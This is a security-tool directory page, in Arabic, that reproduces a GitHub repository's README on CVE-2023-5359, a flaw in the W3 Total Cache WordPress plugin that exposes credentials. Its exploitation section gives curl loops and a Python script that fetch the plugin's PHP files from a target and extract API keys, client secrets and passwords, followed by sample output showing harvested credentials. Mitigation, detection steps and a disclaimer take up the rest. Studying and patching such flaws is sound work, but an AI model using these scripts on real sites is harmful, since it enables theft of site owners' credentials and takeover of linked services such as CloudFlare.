Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-5359 — CVE-2023-5359 - ماسح ضوئي لثغرة التخزين بنص واضح في W3 Total Cache. يكتشف بيانات الاعتماد المكشوفة في إصدارات إضافة W3 Total Cache ≤ 2.7.5. | Kitploit
أدوات/GitHubGitHub/enzocipher/cve-2023-5359
ماسحات الثغرات الأمنيةهجمات كلمات المرورالاستغلالجمع المعلوماتأمن الويبالتعلم والتعليم
GitHubenzocipher/cve-2023-5359

CVE-2023-5359

CVE-2023-5359 - ماسح ضوئي لثغرة التخزين بنص واضح في W3 Total Cache. يكتشف بيانات الاعتماد المكشوفة في إصدارات إضافة W3 Total Cache ≤ 2.7.5.

عرض المستودع
منذ 9 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-5359 - ثغرة التخزين غير المشفر في W3 Total Cache

الوصف

CVE-2023-5359 هي ثغرة تخزين غير مشفر تؤثر على إضافة ووردبريس W3 Total Cache في الإصدارات ≤ 2.7.5. تسمح هذه الثغرة للمهاجمين عن بُعد بالوصول إلى بيانات اعتماد حساسة مخزنة في ملفات PHP غير مشفرة وقابلة للوصول العام.

الخطورة

  • درجة CVSS: 7.5 (عالية)
  • المتجه: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
  • النوع: كشف معلومات حساسة

الثغرة التقنية

السبب الجذري

يقوم W3 Total Cache بتخزين إعدادات التهيئة وبيانات اعتماد API في ملفات PHP داخل دليل /wp-content/plugins/w3-total-cache/ دون حماية كافية. هذه الملفات قابلة للوصول عبر HTTP، مما يعرض ما يلي:

  • مفاتيح API (CloudFlare, Google، إلخ.)
  • أسرار العميل
  • رموز OAuth المميزة
  • بيانات اعتماد الخدمات الخارجية

الملفات المتأثرة

root@kitploit:~
/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php
/wp-content/plugins/w3-total-cache/Generic_Plugin_Admin.php
/wp-content/plugins/w3-total-cache/Extension_FeedBurner_Plugin.php
/wp-content/plugins/w3-total-cache/Config.php
/wp-content/plugins/w3-total-cache/Cache_File.php

الاستغلال

الطريقة اليدوية

root@kitploit:~
# Check if W3 Total Cache is installed
curl -s https://target.com/ | grep "w3-total-cache"

# Extract CloudFlare credentials
curl -s "https://target.com/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php" | grep -E "client_id|client_secret"

# Search all vulnerable files
for file in Extension_CloudFlare_Plugin.php Generic_Plugin_Admin.php Config.php; do
    echo "=== $file ==="
    curl -s "https://target.com/wp-content/plugins/w3-total-cache/$file" | grep -E "api_key|password|secret"
done

السكربت الآلي

root@kitploit:~
#!/usr/bin/env python3
import requests
import re

target = "https://victim.com"
files = [
    "/wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php",
    "/wp-content/plugins/w3-total-cache/Generic_Plugin_Admin.php"
]

for file in files:
    response = requests.get(target + file)
    credentials = re.findall(r"(api_key|client_secret|password)\s*=\s*['\"](https://github.com/enzocipher/cve-2023-5359/blob/HEAD/%5B%5E%27%5C%22%5D+)", response.text)
    if credentials:
        print(f"[!] Credentials found in {file}:")
        for key, value in credentials:
            print(f"    {key}: {value}")

التأثير

يمكن للمهاجم الحصول على:

  1. بيانات اعتماد CloudFlare - السيطرة على CDN وDNS
  2. مفاتيح API للخدمات الخارجية - الوصول إلى الحسابات الخارجية
  3. رموز OAuth المميزة - انتحال الهوية
  4. إعدادات الكاش - التلاعب بالمحتوى المُقدَّم

التخفيف

الحل الفوري

  1. قم بالتحديث إلى W3 Total Cache ≥ 2.7.6
  2. قيّد الوصول إلى ملفات PHP في دليل الإضافات
  3. قم بإبطال وإعادة توليد جميع بيانات الاعتماد المكشوفة

التهيئة الآمنة

root@kitploit:~
# .htaccess protection
<Files *.php>
    Deny from all
</Files>
<Files "w3-total-cache.php">
    Allow from all
</Files>

الاكتشاف

أمر التحقق

root@kitploit:~
# Check for vulnerable version
curl -s https://target.com/wp-content/plugins/w3-total-cache/w3-total-cache.php | grep "Version"

مؤشرات الاختراق

  • نشاط غير معتاد في واجهات برمجة التطبيقات الخارجية
  • تغييرات في إعدادات CloudFlare
  • حركة مرور من عناوين IP غير مصرح بها إلى الخدمات المتصلة

مثال على النتائج

root@kitploit:~
[*] Scanning: https://example.com
[+] W3 Total Cache detected
[+] Accessible file: /wp-content/plugins/w3-total-cache/Extension_CloudFlare_Plugin.php
[!] CREDENTIALS FOUND:
    client_id: GAxxxxxxxxxxxx78
    client_secret: ABcdEFghIJklMNopQRstUVwxYZ012345

المراجع

  • CVE-2023-5359
  • سجل تغييرات W3 Total Cache
  • فريق أمان ووردبريس

إشعار قانوني

هذا المستودع مخصص للأغراض التعليمية واختبار الاختراق المصرح به فقط. الاستخدام الخبيث لهذه المعلومات محظور تمامًا.


هل وجدت هذه المعلومات مفيدة؟ قم بوضع نجمة على المستودع!

آخر تحديث: نوفمبر 2025

تنزيل الأداة